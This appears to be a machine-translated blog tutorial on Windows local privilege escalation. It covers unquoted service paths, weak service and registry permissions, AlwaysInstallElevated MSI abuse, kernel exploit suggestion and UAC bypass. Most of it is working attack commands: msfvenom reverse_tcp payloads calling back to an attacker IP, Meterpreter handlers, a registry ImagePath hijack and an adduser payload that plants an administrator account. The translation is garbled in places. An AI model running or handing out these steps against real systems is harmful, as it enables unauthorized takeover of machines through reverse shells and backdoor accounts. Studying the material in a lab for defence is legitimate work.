Raising rights is generally divided into two kinds:

1. Local entitlement: Users with low privileges can exploit some vulnerabilities to change permissions to administrator level.
2. Remote entitlement: You can directly obtain administrator rights during remote attacks.

After that, most of the rights are local rights!

1. createC:\Program Files\A app\A exe\myexe.exeFolder that does not exist in path,myexe.exeYou can directly create a new text file rename to get! Give full control of an app folder to all users (everyone). If you can’t find everyone, add it manually!
   
   
2. Enter in CMD,SC Create "Test Service" binPath= "C:\Program Files\A app\A exe\myexe.exe" start= autoCreate a service
3. And open the registry (presswin+RAnd then typeregedit) finds the created serviceHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\services\ Test Service
4. Give it full control to everyone, too!

Incognito needs to be loaded in sessions
load incognito
# check the current available users
list_tokens -u
# Switch user
impersonate_token "Username"
Copy the code

This vulnerability are mainly man-made causes, mostly due to improper service path of the administrator or the software configuration and the main cause of the vulnerability is analytical service binaries exist in the corresponding file path space System caused by the ambiguity, because Windows services are usually has a System administrator (System) permission to run, so we are If masquerading as a system service process, you can obtain system administrator privileges! Such as:

There is a path in the system service
C:\Program Files\Firefox Developer Edition\firefox.exe
# this path has many ambiguities, such as
C:\Program.exe
C:\Program Files\Firefox.exe
C:\Program Files\Firefox Developer.exe
C:\Program Files\Firefox Developer Edition\firefox.exe
Copy the code

First of all, we can enter the following command in the target shell. If there is a service item with space cut and no quotation marks in the path, it represents the existence of this vulnerability!

wmic service get name,displayname,pathname,startmode
Find syntax quickly
wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr/i /v """
Copy the code

From the path above we can see that we can try to exploit the path flaw to execute the A.xe file, so we create an attack payload and name it A.xe

# here my drone is 32 bit so attack load written can directly, if it is 64, you need to use Windows/x64 meterpreter/reverse_tcp!!!!!!
This command needs to be executed outside msfConsole!
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=9999 -f exe -o A.exe
# enable listening in MSF (this command is executed in MSfConsole)
handler -H 192.168.1.200 -P 9999 -p windows/meterpreter/reverse_tcp
# Go to the target non-admin console (if you don't know where to do this, you can check out MSF first!!)
session 5
Upload file to specified folder (this is done in session!!)
upload A.exe "C:\Program Files\A app"
Restart service (this is performed in the target shell!! Enter the target shell by typing shell in Sessions.)
# If there is a message indicating insufficient permissions, then this means that the target machine is not available, you can try to change a service test!
sc stop "Test Service"
sc start "Test Service"
Copy the code

Under normal circumstances, we will be forcibly disconnected shortly after connecting, which is also the Windows security mechanism plays a role, because our service is not normally connected after starting, so it will soon be cut off by Windows, if you do not want to be cut off by Windows, we need to carry out a process migration! In the listener, we can perform automatic process migration

Load the listener module
use exploit/multi/handler
Start the process migration module
set autorunscript migrate -f
# General Settings
set LHOST 192.168.1.200
set LPORT 9999
The payload must be exactly the same as the attack payload, otherwise the connection will fail!!
set payload windows/meterpreter/reverse_tcp
# run a listener to start the migration module.
run
Copy the code

PS: My goal above is to use the path space, but if you have permission, you can also replace the specified file with your Trojan horse, this is called unsafe file/folder permissions, such as the above we directly replacemyexe.exe, but usually this kind of file will be running by the system and cannot be replaced! So I’m not going to do that.

Accesschk Permission query tool download address: docs.microsoft.com/zh-cn/sysin… This is an official Microsoft tool! Usage:

You can select the 64-bit or 32-bit version based on the current system
accesschk.exe -ucqv "Username" * /accepteula
accesschk64.exe -ucqv "Username" * /accepteula
Then look for the service with full control (services_all_access)
Copy the code

Services_all_access: Has full control over the properties of this service



Here I’ll take the service I created above

First let’s look at the details of this service:sc qc "Test Service"

Here we’re going to focus onBINARY_PATH_NAMEThe binary file path is the executable file path. Although I say path here, any command can be executed here, and it will be run as a system administrator.

This can also be done automatically through insecure service permissions using MSF scripts!

Load the service permission module
use exploit/windows/local/service_permissions
# Set empowerment targets
set sessions 1
# run
run
Copy the code

For example, we have successfully carried out the exercise of rights

And we’re using the same thing hereTest ServiceTo do our goal test, similar to the above service, here we are going to modifyImagePathPath information, to achieve the purpose of malicious script execution!

Here we use an MSF script to create an administrator account!

Create a Trojan to create a user
msfvenom -p windows/adduser USER=QAQ PASS=1qaz@WSX -f exe -a x86 --platform windows > adduser.exe
# upload the Trojan horse to the destination host (if you cannot upload it to the current directory, you can now CD %temp% to the destination's temporary directory)
upload adduser.exe
Alter registry (execute in shell)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Test Service" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\xunmi\AppData\Local\Temp\adduser.exe" /f
If you have permission, restart the service
sc stop "Test Service"
sc start "Test Service"
If not, restart the machine to restart the service effect
shutdown /r /t 0
# You'd better recover after you finish
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Test Service" /t REG_EXPAND_SZ /v ImagePath /d "C:\Program Files\A app\A exe\myexe.exe" /f
Copy the code

Here for the convenience of demonstration, I will not restart, using the administrator to restart the service, successfully let our designated user online! And this user also has administrator rights!

This is also a policy setting that allows any user on the system to have system Administrator privileges (MSI) installed. This permission is disabled by default and needs to be enabled manually!

PS: Local Group Policy Editor (gpedit.msc) This vulnerability only exists in Windows Professional, Enterprise or Server versions. The Windows7 Home version I used before did not have this vulnerability, so I changed my target machine to Windows Server 2016

Here we need to generate a.msi installation package, MSF currently can not generate a true. Msi format program, false. Msi format can not obtain the system administrator permission, so we can use special generated. .msi format installation package generator download address: www.exemsi.com/downloads/m…

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=7999 -f exe -oNon-toxic and natural. Exe# enable monitor
handler -H 192.168.1.200 -P 7999 -p windows/meterpreter/reverse_tcp
Copy the code

Use MSI to generate installation packages, and then pass the generated installation packages to the target machine for running!

There are many kinds of Windows kernel vulnerabilities. If we detect them one by one, it will be time-consuming and exhausting. The basic idea is to check the specific version information of the other system and the installed vulnerability patch information, and compare whether there are known vulnerabilities according to these information.

MSF vulnerability scanning module for Windows system generally uses the following two modules

View the installed patch of the target
post/windows/gather/enum_patches
# Look for vulnerabilities that the target can exploit
post/multi/recon/local_exploit_suggester
Copy the code

For example, we used: local_exploit_suggester

Automatic scanning for vulnerabilities existing in target hosts
use post/multi/recon/local_exploit_suggester
Select the target host
set session 2
# Display details (default not to display details!)
set showdescription true 
Copy the code

So I’m going to use the scan herems13_053_schlampereivulnerability

Select the attack payload
use exploit/windows/local/ms13_053_schlamperei
# select target (my previous target 2 was disabled by accident, and then I reconnected to target 3, both of which were the same host)
setg session 3
# start
run
Copy the code

You can see that we have successfully raised rights with MSF.

Origin Potato: github.com/foxglovesec… RottenPotato & JuicyPotato: github.com/ohpe/juicy-… RoguePotato: github.com/antonioCoco… SweetPotato: github.com/CCob/SweetP…

# loading bypassUAC
use exploit/windows/local/bypassuac
# routine set, the default load for Windows/meterpreter/reverse_tcp attack
setPayload Attack payloadsetLHOST Indicates the local addresssetLPORT port# select the target that you want to use bypassUAC
set session 1
run
# Main: The prerequisite for success is that the user currently under our control is in the user administrator group!
# use bypassUAC to successfully get the target console by entering getSystem.
getsystem
Copy the code